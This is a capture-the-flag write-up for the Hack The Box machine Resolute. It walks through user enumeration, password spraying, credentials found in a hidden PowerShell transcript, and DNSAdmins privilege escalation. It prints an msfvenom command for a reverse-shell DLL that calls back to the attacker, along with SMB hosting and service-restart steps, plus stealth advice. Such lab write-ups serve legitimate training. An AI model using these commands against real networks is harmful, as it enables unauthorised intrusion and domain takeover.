# RESOLUTE | 10.10.10.169

## Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial IP

### Ports and Services

![nmap](img/nmap.png)

This is a Domain Controller, so I don't need to enumerate every single one of the ports. The domain name is apparently MEGABANK, so we'll need that for some of our enumeration from here on in.

#### 135 - MSRPC

I used rpcclient to enumerate some things. `enumdomusers` got me a userlist:

![user list](img/enumusers.png)

And `enumdomgroups` got me a group list, one of which was 'Contractors' which is not a Windows default group.

![group list](img/enumgroups.png)

Using `querydispinfo` can grab a bit of info about the users, and for one of them the Description has a clue:

![querydispinfo](img/query.png)

Trying this username and password combination, however, does not result in a successful login.

#### 445 - SMB

I tried null auth and guest auth but I could not get anything. But at least I now have a potential list of users to test with kerbrute.

## Exploitation with KerBrute > evil-winrm

This is an excellent tool to enumerate kerberos in Windows, and especially to confirm valid users without having to attempt authentication which would normally set off alarms. I ran the userenum param and it turns out all 24 usernames are indeed valid:

![kerbrute userenum](img/kerbrute.png)

Since I have a valid user list, and maybe a valid password for one of these accounts, I can use kerbrute to do a password spray attack.

![password spraying with kerbrute](img/spray.png)

I do a quick check with crackmapexec (using the smb and winrm options to see if I have a quick win), and it turns out I can get a shell with evil-winrm:

![crackmapexec smb](img/cmesmb.png)

![crackmapexec winrm](img/cmewinrm.png)

And I can confirm I have access as Melanie:

![evil-winrm shell](img/mel-shell.png)

## Privilege Escalation - melanie > ??

### Enumeration with winPEAS

I uploaded winPEAS onto the box and ran that, but there were no red flags, besides it informing me that a PSTranscripts directory existed; however it didn't show any files:

![PSTranscripts directory](img/pstranscripts.png)

So I decided to go the directory myself and check for hidden files.

![hidden dir](img/hidden.png)

Inside that was a hidden txt file that had the other user, Ryan's, credentials:

![credentials](img/ryan-creds.png)

I was able to use those credentials to get a winrm shell as ryan:

![shell as ryan](img/ryan-shell.png)

On ryan's desktop there is a curious note:

![note](img/note.png)

I suppose that means if I change anything in order to escalate my privileges then I only have one minute to take advantage of it.

### Further enumeration as Ryan

Ryan does not appear to be that different from Melanie in terms of permissions, except for the fact that he is a member of the DNSAdmins group, which you will find out if you run bloodhound or do a simple `whoami /groups`.

![DNSAdmins](img/ryan-groups.png)

DNSAdmins are able to make certain changes to the DNS service, and since this is a Domain Controller, it is running a DNS server. This can be exploited. Usually a DNSAdmin cannot by default restart a DNS server - but since this is a HTB machine and restarting the entire machine is not allowed, there is a good chance that in this special case Ryan can indeed stop and start the DNS server.

We can check this by using the `sc query` command if you have a command shell, but in evil winrm we have to prepend that with `cmd /c`. Running `cmd /c "sc sdshow dns"` will output a lot of what looks like gibberish but are "Security Descriptors". I highlighted the relevant part in the output, as that shows the permissions over DNS for Ryan:

![sc sdshow](img/scquery.png)

For what it's worth, trying to run that command as melanie fails because that user has no permissions to do so. But basically it is showing that Ryan has start,stop, and restart permissions over DNS (specifically the 'RP', 'WP' and 'DT' flags). I used information from [here](https://www.winhelponline.com/blog/view-edit-service-permissions-windows/#sc_sdshow) to figure this out as who can remember all that?

### Exploit method

So, with these permissions in place, we can escalate to Administrator/Domain Admin. We can inject a malicious dll file and then restart the DNS service. When it restarts, the dll executes and connects back to our attacker machine.

To create the malicious dll, I used msfvenom:

    msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=6969 -f dll -o koopa.dll

Then we need to have an SMB server running, hosting the plugin, so we can load it remotely:

    sudo smbserver.py -smb2support share .

Next, on the victim machine, I had to run `dnscmd` to use my privileges to tell DNS to load my dll the next time it runs.

![dnscmd](img/dnscmd.png)

After doing that you only have one minute to stop and start the service, so you better have a listener going already, and then real quick do `sc.exe stop dns` then `sc.exe start dns`, and in a moment you should have a new reverse shell, but as SYSTEM:

First thing you see is the dll being grabbed from your SMB share:

![smb](img/smb.png)

Then, you get the connect back:

![system shell](img/root-shell.png)

**Note** When done via the msfvenom method, this actually crashes the DNS server, which is terrible for OPSEC. The real stealthy way to do this is to complie your own dll with all the proper exported functions so that the DNS service starts normally and then creates a reverse shell by forking it into a new process, which the msfvenom payload does not do. Watch ippsec's video on Resolute to see how to do that.

## Conclusion

This one threw me for a loop because I am used to using bloodhound to enumerate in order to find a path to Domain Admin, but with this box that is not really how it pans out. I mean, bloodhound should have mentioned this path for escalation but to my knowledge it did not. Or at least there is no Active Directory-related path from melanie to ryan, as that ended up being simply a text file left in a place where it was readable by melanie.

**Steps taken:**

* Find valid users by enumerating RPC
* Find default password in description, do password spray, get access as melanie
* Find PS transcript with plaintext credentials, move laterally to Ryan
* Ryan is DNS Admin, can load malicious plugin to privesc to SYSTEM
